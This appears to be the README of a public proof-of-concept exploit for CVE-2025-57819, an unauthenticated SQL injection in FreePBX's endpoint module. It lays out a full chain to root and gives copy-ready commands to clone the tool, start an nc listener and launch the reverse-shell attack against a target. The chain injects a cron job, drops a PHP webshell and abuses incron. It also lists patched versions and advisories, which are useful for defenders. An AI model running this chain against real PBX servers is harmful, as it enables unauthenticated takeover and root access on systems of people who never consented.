Exploit for SQL Injection in Sangoma Freepbx CVE-2025-57819

## https://sploitus.com/exploit?id=D3C0976F-73D0-56D5-A6FE-0D68A14D8753
# CVE-2025-57819 — FreePBX SQLi → RCE → Root

Full-chain PoC for CVE-2025-57819. Unauthenticated error-based SQL injection in FreePBX's endpoint module chains into a root shell via cron job injection and incron privilege escalation.

> **For authorized testing and research only. Do not use against systems you don't own.**

---

## What it does

```
SQLi (EXTRACTVALUE) → INSERT cron job → webshell drop → incron trigger → root shell
```

1. Extracts DB info via error-based injection on `/admin/ajax.php`
2. Injects a cron job that writes a PHP webshell to the web root
3. Waits for cron to fire (~60s), confirms RCE as `asterisk`
4. Creates an incron trigger file that fires `fwconsole` hook as root
5. Catches reverse shell on your listener

---

## Setup

```bash
git clone https://github.com/ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
cd CVE-2025-57819-FreePBX-RCE2Root
pip install -r requirements.txt
```

---

## Usage

```bash
python3 CVE-2025-57819.py    [--cleanup]
```

Start a listener first:
```bash
nc -lvnp 9999
```

Then run:
```bash
python3 CVE-2025-57819.py freepbx.example.com 192.168.1.50 9999
```

`--cleanup` removes the webshell and cron job after exploitation.

---

## Affected

FreePBX with the `endpoint` module installed. The `brand` parameter in `/admin/ajax.php` is passed unsanitized into a SQL query.

| FreePBX | Patched Version |
|---------|----------------|
| 15.x    | `15.0.66`      |
| 16.x    | `16.0.89`      |
| 17.x    | `17.0.3`       |

---

## References

- [FreePBX Security Advisory GHSA-m42g-xg4c-5f3h](https://github.com/freepbx/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3h)
- [NVD — CVE-2025-57819](https://nvd.nist.gov/vuln/detail/CVE-2025-57819)

---

## Author

ozcanpng — [github.com/ozcanpng](https://github.com/ozcanpng) — [ozcanpng.dev](https://ozcanpng.dev)